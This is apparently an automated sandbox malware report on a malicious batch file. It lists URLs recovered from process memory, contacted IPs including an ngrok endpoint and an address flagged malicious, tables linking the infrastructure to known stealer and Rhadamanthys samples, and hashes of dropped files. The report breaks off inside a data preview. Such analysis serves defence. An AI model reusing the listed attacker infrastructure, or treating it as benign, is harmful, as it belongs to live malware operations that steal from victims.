https://paper.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellofax.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pal-test.adyen.com	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/o/oauth2/revoke	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellosign.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://instructorledlearning.dropboxbusiness.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/page_success/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/pithos/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msn.com/	msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://a.sprig.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000004.00000003.1800129032.00000252A9EA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/encrypted_folder_download/service_worker.js	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/rowser	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://navi.dropbox.jp/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/api/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com/de	bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000002.2411874029.00000000029D8000.00000002.00000001.01000000.00000013.sdmp	false		high
https://docsend.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2334133649.0000013D1D045000.00000004.00000800.00020000.00000000.sdmp	false		high
https://showcase.dropbox.com/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/serviceworker/	powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudflare-dns.com/dns-query	fontdrvhost.exe, 00000018.00000003.2440367132.0000000005714000.00000004.00000020.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/MergeSession	msedge.exe, 00000003.00000003.1799863625.00004AFC00280000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/	msedge.exe, 00000003.00000002.1815961673.00004AFC002E0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.21.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.6.122.107	1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	United States	16509	AMAZON-02US	false
162.125.69.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
162.125.69.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
142.251.37.33	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.161.43.18	unknown	United States	53755	IOFLOODUS	true

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576698
Start date and time:	2024-12-17 12:13:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	122046760.bat
Detection:	MAL
Classification:	mal100.troj.evad.winBAT@72/328@16/10
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 204.79.197.239, 13.107.21.239, 172.217.19.206, 13.107.6.158, 2.16.158.72, 2.16.158.56, 2.16.158.57, 2.16.158.48, 2.16.158.58, 2.16.158.43, 2.16.158.73, 2.16.158.42, 2.16.158.51, 23.32.239.56, 23.32.239.18, 199.232.214.172, 23.218.208.109, 192.229.221.95, 2.20.68.206, 2.20.68.223, 2.19.198.8, 2.19.198.26, 2.16.158.176, 2.16.158.27, 2.16.158.186, 2.16.158.26, 2.16.158.32, 2.16.158.179, 2.16.158.192, 2.16.158.185, 2.16.158.187, 52.168.117.173, 142.251.40.99, 142.251.40.227, 52.149.20.212, 13.107.246.63, 142.251.40.202, 13.107.246.40, 23.200.0.6, 40.126.53.18
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, onedsblobprdeus16.eastus.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net
Execution Graph export aborted for target bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, PID 5460 because there are no executed function
Execution Graph export aborted for target fontdrvhost.exe, PID 932 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7552 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 122046760.bat

Simulations

Behavior and APIs

Time	Type	Description
06:14:02	API Interceptor	12584x Sleep call for process: powershell.exe modified
06:14:12	API Interceptor	2x Sleep call for process: svchost.exe modified
06:15:51	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:14:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
11:14:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868 "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.21.237	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	Get hash	malicious	HTMLPhisher	Browse
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse
	1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	https://trinasolarus-my.sharepoint.com/:f:/g/personal/matt_hutchison_trinasolar_com/EuTm6V8CKxFPmV0-8tDYkU8B7bgg8BNpE1Urptg3NNJsZw?e=bQub2M	Get hash	malicious	Unknown	Browse
	B3N4x4meoJ.bat	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
3.6.122.107	RN2vknsx6G.exe	Get hash	malicious	RedLine	Browse	0.tcp.in.ngrok.io:17440/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fg.microsoft.map.fastly.net	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse	199.232.214.172
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	199.232.210.172
	751ietQPnX.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	l92fYljXWF.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	qxjDerXRGR.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	taCCGTk8n1.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	Richiesta di Indagine sulla Violazione del Copyright lnk.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
chrome.cloudflare-dns.com	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	172.64.41.3
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	172.64.41.3
	Setup.exe (1).zip	Get hash	malicious	Unknown	Browse	172.64.41.3
	Smple_Order-048576744759475945.xls	Get hash	malicious	Unknown	Browse	162.159.61.3
	BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls	Get hash	malicious	Unknown	Browse	162.159.61.3
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	172.64.41.3
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	172.64.41.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	3.125.209.94
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	3.125.209.94
	https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.com	Get hash	malicious	Unknown	Browse	34.208.140.8
	https://www.google.com/amp/s/wellsecure.es/.secure##email##	Get hash	malicious	Unknown	Browse	13.248.193.251
	https://alluc.co/watch-movies/passengers.html	Get hash	malicious	Unknown	Browse	35.75.86.132
	https://eol-group.jimdosite.com/?utm_source=newsletter&utm_medium=email&utm_campaign=ce	Get hash	malicious	HTMLPhisher	Browse	3.255.10.234
	setup.msi	Get hash	malicious	AteraAgent	Browse	13.232.67.198
	fGZLZhXIt1.bat	Get hash	malicious	Unknown	Browse	185.166.143.48
	V7giEUv6Ee.bat	Get hash	malicious	Unknown	Browse	185.166.143.50
	BwQ1ZjHbt3.bat	Get hash	malicious	Unknown	Browse	185.166.143.48
MICROSOFT-CORP-MSN-AS-BLOCKUS	IAK4Rn3bfO.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	20.233.83.145
	2.elf	Get hash	malicious	Unknown	Browse	20.75.46.173
	Untitled.eml	Get hash	malicious	Unknown	Browse	104.47.11.220
	setup.msi	Get hash	malicious	AteraAgent	Browse	20.50.88.227
	1.elf	Get hash	malicious	Unknown	Browse	20.75.46.173
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	52.228.167.51
	2.elf	Get hash	malicious	Unknown	Browse	20.75.46.173
	1.elf	Get hash	malicious	Unknown	Browse	20.223.15.46
	1.elf	Get hash	malicious	Unknown	Browse	20.75.46.173
	https://mailustabucaedu-my.sharepoint.com/:u:/g/personal/stella_pabon_ustabuca_edu_co/EWCk8BqICKBBrExz32n-PvYBCVoLK4PToNCGKPT0vElGYg?e=w0tQWE	Get hash	malicious	Unknown	Browse	52.97.168.210
DROPBOXUS	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse	162.125.69.15
	2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	162.125.69.15
	https://dashboard.sizle.io/p/f7c9cdf19	Get hash	malicious	HTMLPhisher	Browse	162.125.69.18
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	garsukhjdf11.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	uEhN67huiV.dll	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	Clienter.dll.dll	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	Clienter.dll.dll	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	http://85off-lv.com	Get hash	malicious	Unknown	Browse	3.6.122.107 162.125.69.18 162.125.69.15
	V65xPrgEHH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	3.6.122.107 162.125.69.18 162.125.69.15

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.327451647251532
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrk:KooCEYhgYEL0In
MD5:	2D3DA4C2CA0C75EF5B0AF2BBE9C423A6
SHA1:	21E04B31D9CBEDED863ABCEBEDB16D9113DC0D96
SHA-256:	AF1C4F396B49DD63DC5F1D6D0E3679FE863735BCB99E99DB18B25EEF65E9F26C
SHA-512:	06F5F762420679BD28D63F255F1E3BFDE471C93DB6D85600F44EAE25626FDADF269E0238615644551A9621C418C68D07C31D660D7D9D554B3763C719B9EE8A95
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6602580454397351
Encrypted:	false
SSDEEP:	96:iFFxLU3ed9qigKJQs3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAXl:ebLEQHnQxR0apYKjqzuiFeZ24lO8JO
MD5:	DF6D4B2C33E7171E5B0610A3F89380E7
SHA1:	37B63022DC3325FCB2F33B8444B33DE233255349
SHA-256:	4F7B07BE0C6621A9D173F9B5F4F9EC4397EF88DC658E118B167588D647F7E902
SHA-512:	C082C5F184638FB108BF0142DE0F777021303E218A46B38E51D892A5C0BCA79300D9B8D4BCFD8E12C90F535156C443D36DAF82578F4C39D632BC4E17F247301F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.0.7.7.2.7.0.7.7.9.4.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.0.7.7.2.7.5.7.8.0.4.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.6.4.b.7.7.0.-.4.9.d.8.-.4.c.e.a.-.8.1.0.3.-.d.1.c.f.1.d.a.c.1.b.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.b.e.3.f.3.4.-.8.6.4.2.-.4.8.1.d.-.8.6.a.d.-.1.6.4.c.3.f.e.7.d.c.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.3.d.4.-.0.0.0.1.-.0.0.1.4.-.3.6.e.7.-.9.0.f.7.7.4.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25015
Entropy (8bit):	6.031140956602361
Encrypted:	false
SSDEEP:	768:/MkbJrT8IeQc501PC8ATb/LhlFTgfDSTR:/Mk1rT8HM1oTKDG
MD5:	F8BF7CA581F90A7269840D79BDC570ED
SHA1:	13949491AD7609BF586F9242901EE01552F62DBC
SHA-256:	7A30E0025A29E717ECE3772AA084D6B8A149C4B0F93720F26255F4B99AF4EF6B
SHA-512:	2B15F8234F2FF015CC45C33CD0B4E8EA499FDC26822F254DF040F59AA085363AF102C5CD256FE0A583553D6DE817A831CE8795EE914600252E5CB081691413B5
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13378907654139576","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734434059"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2